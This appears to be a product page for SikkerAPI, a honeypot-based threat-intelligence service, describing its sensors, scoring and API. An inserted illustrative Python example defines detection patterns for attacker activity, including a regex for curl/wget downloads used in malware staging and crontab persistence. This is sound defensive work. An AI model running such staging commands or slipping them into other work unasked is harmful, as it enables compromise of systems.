Threat intelligence built on SikkerNet, a distributed honeypot network that captures real attacker behavior across 17 protocols in real time
SikkerAPI started as SikkerNet, a private honeypot network built to study what attackers do after gaining access to a system. The sensors accept all credentials because the goal is observing post-authentication behavior: command execution, lateral movement, malware staging, persistence mechanisms, and data exfiltration.
SikkerNet grew into a global sensor fleet processing millions of events per day. We built an API around it to give security teams, developers, and researchers access to the same threat data. Every feature is available on the free tier. Paid plans expand capacity, not functionality.
Each SikkerNet sensor is a custom honeypot application written in Kotlin that simultaneously emulates 17 network protocols: SSH, HTTP, FTP, SMTP, MySQL, PostgreSQL, MongoDB, Redis, Docker, Telnet, Elasticsearch, MSSQL, IMAP, SMB, RTSP, SIP, and RDP. Unlike low-interaction honeypots that only log connection attempts, our sensors accept all credentials and engage attackers in realistic post-authentication environments.
The SSH honeypot alone implements 105+ commands with full argument parsing, realistic output, and a virtual filesystem that persists across the session. Attackers run uname, whoami, nvidia-smi, curl, wget, docker ps, crontab and get convincing responses for each one. This captures real attack tooling, malware download URLs, and persistence mechanisms that low-interaction honeypots cannot observe.
Every event is captured raw and uninterpreted. The sensor records exactly what the attacker did at the byte level. Analysis, scoring, and classification happen centrally after ingestion. Sensors are disposable: if one is compromised, it can be replaced in under a minute. Events are buffered locally and delivered with at-least-once guarantees, so nothing is dropped when the central infrastructure is temporarily unreachable.
Raw events from sensors are processed by our editorial engine, which decomposes attack activity into two layers. Primitives are atomic indicators: a specific command, download URL, credential pattern, or SQL query matched by operators like EQUALS, CONTAINS, WILDCARD, or REGEX. Behaviors are composite attack classifications built from multiple primitives using AND/OR logic, each mapped to MITRE ATT&CK techniques with a severity level.
Each session is matched against exactly one behavior through exact set matching: the set of primitives observed in the session must be fully accounted for by the behavior definition, with no primitive left over and none missing. An IP accumulates multiple behaviors across separate sessions. The editorial engine tracks a growing catalog of behaviors and primitives across SSH, Telnet, SIP, HTTP, and other protocols. The full catalog is browsable on the threat catalog page.
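A minimal illustration of the two-layer matching described above, added here as an example and not code from SikkerAPI's editorial engine. The primitive and behavior definitions, the severity labels and ATT&CK mappings, and the reading of AND/OR as "OR over AND-groups of primitives" are all assumptions made for the example; the sample commands are constructed.

```python
import fnmatch
import re
from dataclasses import dataclass

@dataclass(frozen=True)
class Primitive:
    """Atomic indicator: one operator applied to a command string."""
    name: str
    op: str       # EQUALS | CONTAINS | WILDCARD | REGEX
    pattern: str

    def matches(self, value: str) -> bool:
        if self.op == "EQUALS":
            return value == self.pattern
        if self.op == "CONTAINS":
            return self.pattern in value
        if self.op == "WILDCARD":
            return fnmatch.fnmatchcase(value, self.pattern)
        if self.op == "REGEX":
            return re.search(self.pattern, value) is not None
        raise ValueError(f"unknown operator {self.op}")

@dataclass(frozen=True)
class Behavior:
    """Composite classification: OR over AND-groups of primitive names (assumed encoding)."""
    name: str
    technique: str   # MITRE ATT&CK id (assumed mapping for this example)
    severity: str
    alternatives: tuple

# Constructed catalog for the example, not SikkerAPI's real primitives/behaviors.
PRIMITIVES = [
    Primitive("recon_uname", "EQUALS", "uname -a"),
    Primitive("recon_gpu", "CONTAINS", "nvidia-smi"),
    Primitive("stage_download", "REGEX", r"^(curl|wget)\b.*https?://"),
    Primitive("persist_cron", "WILDCARD", "*crontab*"),
]
BEHAVIORS = [
    Behavior("host_recon", "T1082", "low",
             (frozenset({"recon_uname"}), frozenset({"recon_uname", "recon_gpu"}))),
    Behavior("stage_and_persist", "T1105", "high",
             (frozenset({"stage_download", "persist_cron"}),)),
]

def session_primitives(commands):
    """Reduce a session's raw commands to the set of primitive names that fired."""
    return frozenset(p.name for p in PRIMITIVES for c in commands if p.matches(c))

def classify_session(commands):
    """Exact set matching: the fired set must equal one AND-group of exactly one behavior."""
    fired = session_primitives(commands)
    hits = [b for b in BEHAVIORS if any(fired == group for group in b.alternatives)]
    return hits[0] if len(hits) == 1 else None   # None: unmatched or ambiguous catalog
```

A session with extra primitives that no single behavior accounts for (e.g. `uname -a` plus `crontab -l`) stays unclassified rather than being forced into the nearest behavior.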
Every observed IP address receives a confidence level from 0 to 100 derived from two evidence sources. Sensor evidence weighs behavior severity, primitive matches, protocol diversity, and session volume. Community evidence weighs individual reports and bulk submissions from defenders, factoring in unique reporter count, report volume, and category severity. When both sources corroborate on the same IP, a multiplier boosts the final score.
Scores are evidence-based and transparent. You can inspect the exact behaviors, primitives, session counts, and community reports behind every score. The scoring methodology is documented. Known-benign scanners like Googlebot and Censys are discounted, with an override parameter to view the raw undiscounted score.
The IP Check API returns confidence levels, geolocation, behavioral classifications, protocol breakdowns, and community report data in a single request. The blacklist endpoint generates filtered IP lists by country, ASN, protocol, severity, and confidence threshold. Bulk reporting handles up to 10,000 IPs per request. STIX/TAXII 2.1 feeds are compatible with Splunk, Microsoft Sentinel, Elastic Security, and QRadar.
SikkerGuard is our server firewall application that pulls threat data from the API and blocks malicious IPs at the kernel level using iptables/ipset on Linux and Windows Firewall on Windows. Blocked connections are reported back to improve the dataset. Integration guides are also available for Fail2Ban, CSF, nginx, and iptables. The CLI tool queries IP reputation and downloads blocklists from the terminal.
SikkerAPI is founder-built and independent. Students, university researchers, and contributing security professionals get free access. No credit card required. Create a free account or read the API documentation.